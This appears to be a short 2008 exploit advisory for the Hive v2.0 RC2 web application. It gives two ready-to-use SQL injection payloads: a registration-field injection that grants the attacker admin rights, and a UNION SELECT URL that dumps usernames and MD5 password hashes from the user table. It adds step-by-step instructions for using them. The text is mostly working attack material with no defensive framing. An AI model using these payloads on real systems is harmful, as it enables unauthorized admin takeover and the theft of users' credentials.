Hive v2.0 RC2 Remote SQL Injection

-= c0ded by j0j0 =-

you must first create an account, and log in.
then you can send exploit
don't forget to change the action="" URL of this form


Username you will use this username to login
Password you will use this password to login
Mail email doesn't have importance
SQL Injection

purpletech', niveau_num=4 WHERE num=2 /* <-- niveau_num is for admin access / num is the member id (default admin id is 2)


Now you are admin, logout and re-login with new username/password

There is another one injection :

http://{HOST}/{PATH}/base.php?page=gestion_membre.php&var=profil&user_id=-9999999'/**/UNION/**/SELECT/**/ 0,concat(nick,char(58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/_user/**/WHERE

then look at the "Pseudonyme" field, you've got LOGIN:MD5_PASSWORD)

# [2008-01-11]